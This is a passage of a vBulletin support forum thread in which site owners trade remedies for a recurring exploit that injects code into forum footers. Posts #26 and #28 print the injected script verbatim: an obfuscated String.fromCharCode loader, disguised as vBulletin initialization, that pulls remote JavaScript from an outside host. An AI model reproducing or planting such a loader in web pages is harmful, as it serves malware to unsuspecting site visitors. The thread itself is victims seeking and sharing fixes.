Announcement

Collapse
No announcement yet.

A fix if your site is already exploited

Collapse
X
  • Filter
  • Time
  • Show
Clear All
new posts

  • #16
    Originally posted by Jaxo View Post
    Ok, It appears you are correct,. I removed the skin and reinstalled and its clean// Thank you

    I notice original post is from 2009,.. still no proper fix for this?
    You need to find your apache access logs. They give a lot of clue to whats going on and if they can still get in. Change account passwords as well.

    Comment


    • #17
      Thanks zerohour, I appreciate the help m8.

      Comment


      • #18
        anything in particular I should be looking for?

        Comment


        • #19
          Originally posted by Jaxo View Post
          Ok, It appears you are correct,. I removed the skin and reinstalled and its clean// Thank you

          I notice original post is from 2009,.. still no proper fix for this?
          uhhh... the original post is from yesterday.. what are you talking about 2009? Please go back and read again.

          Yesterday, 2:03am

          Comment


          • #20
            Originally posted by Jaxo View Post
            anything in particular I should be looking for?
            Tbh although others have said it wont help a screenshot or list of addons might point out a recently hacked one.

            Comment


            • #21
              This is mad, I have excatly the same issue for few days now and have no idea what is causing it. Please help.
              http://angliki.info

              Comment


              • #22
                Originally posted by Diablotic View Post
                This is mad, I have excatly the same issue for few days now and have no idea what is causing it. Please help.
                Open your footer template in the style you're using and then click save and close. This rebuilds the file and removes the exploit. This is however just a work around to remove it and doesn't fix the root cause.

                +1 for the same exploit.

                VB - any word on finding how they're doing this?

                We're running VB/CMS 4.1.8 + vbSEO 3.6.0 and that's about it.

                Comment


                • #23
                  I did that yesterday but it's back this morning again. I am running vbSeo as well. I can see that there is a fix for the newest version: http://www.vbseo.com/f5/vbseo-securi...release-52783/

                  I will fix it now, remove the malicious code and see if it's back again today or tomorrow.
                  http://angliki.info

                  Comment


                  • #24
                    Originally posted by tagthis View Post
                    VB - any word on finding how they're doing this?
                    Nope... Not enough information given, no access to any of the sites with this issue. There is a number of ways that are possible. Until people actually give information about their sites instead of "delete this line to fix it" there is no way to determine how it happened. Ideally, we would need a support ticket with complete access to the server and a compromised forum to look at. We'll probably need the web logs of the date the exploit happened as well but most people don't even save those for more than 24 hours.
                    Translations provided by Google.

                    Wayne Luke
                    The Rabid Badger - a vBulletin Cloud customization and demonstration site.
                    vBulletin 5 Documentation - Updated every Friday. Report issues here.
                    vBulletin 5 API - Full / Mobile
                    I am not currently available for vB Messenger Chats.

                    Comment


                    • #25
                      Originally posted by Diablotic View Post
                      I did that yesterday but it's back this morning again. I am running vbSeo as well. I can see that there is a fix for the newest version: http://www.vbseo.com/f5/vbseo-securi...release-52783/

                      I will fix it now, remove the malicious code and see if it's back again today or tomorrow.
                      Let us know how it goes. I've looked at the fix and for some reason i don't have a
                      /vbseo/includes/functions_vbseocp_abstract.php

                      file. So i can't apply it. Also the link to their testing utility (v3) isn't working by the looks of it.

                      Wayne, i'll open a support ticket if it comes back again.

                      Comment


                      • #26
                        Same problem! Fixed the vbSEO bug, also had a problem redirecting the URL to a 3rd party site. That has been fixed. However still getting this following Java script in the footer file. Re-building the footer by saving it didnt work. What can I do?

                        Code:
                        <script type="text/javascript">
                        <!--
                        // Main vBulletin Javascript Initialization
                        var script=document.createElement(String.fromCharCode(115,99,114,105,112,116));script.src=String.fromCharCode(104,116,116,112,58,47,47,106,115,45,115,116,111,114,97,103,101,46,105,110,47,106,113,117,101,114,121,46,99,111,109,112,97,116,105,98,105,108,105,116,121,46,106,115);var head=document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0];head.appendChild(script);vBulletin_init();
                        //-->
                        </script>

                        Comment


                        • #27
                          Originally posted by Wayne Luke View Post
                          Nope... Not enough information given, no access to any of the sites with this issue. There is a number of ways that are possible. Until people actually give information about their sites instead of "delete this line to fix it" there is no way to determine how it happened. Ideally, we would need a support ticket with complete access to the server and a compromised forum to look at. We'll probably need the web logs of the date the exploit happened as well but most people don't even save those for more than 24 hours.
                          I opened a ticket and was asked to pay $80 before you'd look at it. Then I was directed to the forums.

                          I did pay $100 for the publishing suite upgrade so I could get support for this, but no one replied to my ticket and fortunately this thread was posted and the problem was solved.

                          I gave vBulletin full access to my server, all the passwords they could possibly need.

                          Comment


                          • #28
                            Originally posted by CountRock View Post
                            Same problem! Fixed the vbSEO bug, also had a problem redirecting the URL to a 3rd party site. That has been fixed. However still getting this following Java script in the footer file. Re-building the footer by saving it didnt work. What can I do?

                            Code:
                            <script type="text/javascript">
                            <!--
                            // Main vBulletin Javascript Initialization
                            var script=document.createElement(String.fromCharCode(115,99,114,105,112,116));script.src=String.fromCharCode(104,116,116,112,58,47,47,106,115,45,115,116,111,114,97,103,101,46,105,110,47,106,113,117,101,114,121,46,99,111,109,112,97,116,105,98,105,108,105,116,121,46,106,115);var head=document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0];head.appendChild(script);vBulletin_init();
                            //-->
                            </script>
                            If you follow the advice in the first post that's how you remove the code from your database. In order to make sure it never returned I personally removed all plugins and all files associated with them from the server, apart from vBSEO, I just made sure that was the up-to-date version. That fixed it for me.

                            Comment


                            • #29
                              Originally posted by Mr Jolly View Post
                              If you follow the advice in the first post that's how you remove the code from your database. In order to make sure it never returned I personally removed all plugins and all files associated with them from the server, apart from vBSEO, I just made sure that was the up-to-date version. That fixed it for me.
                              Did what the 1st post said! fixed for the time being.

                              Comment


                              • #30
                                Hello,

                                I know that this problem has effected most versions of vBulletin
                                You guys are talking about the 4x version but it all sounds very similar to what happened to my forum

                                I am old 3x version and I am not here to tell you what the problem is or how to fix it, but

                                I have been in battle with a crazy redirect which has been on for about 2 weeks,

                                It is hard to read through all the forums and see what others have said to do and because it is a ongoing problem
                                there are little updated fixes

                                I dont know if the problem is vBulletin or vbseo (which I have installed latest version)

                                what fixed my problem was

                                1. doing a full re instal of vbseo all files

                                2. changed passwords to everything eg. forumcp database cpannel vbseocp and others (make sure to edit config for new passwords)

                                3. changing permissions to all config files forum and vbseo I had done this via ftp but after much trial and error found that this had to be done via cpanel - file manager dont know why just worked!

                                4. I could not get my warning message in my vbseocp to change until I did the permission change for the config file via cpanel (the message was saying that you should edit your config permissions to securer your site) once I did it removed the message.


                                I hope this may help someone, and I am still looking into some changes that have been mate to my database
                                extra tables were added, related to tags, I dont know much about these tables other than I did not create them and they were created
                                about the same time as I started to have problems.

                                You can have a look at a screen shot here if you want to see them

                                https://www.vbulletin.com/forum/show...emp-tag-tables

                                Like I said I have no answers and dont know the cause, but this worked for me

                                Regards
                                Ryan
                                Crime case files

                                Comment

                                widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
                                Working...
                                X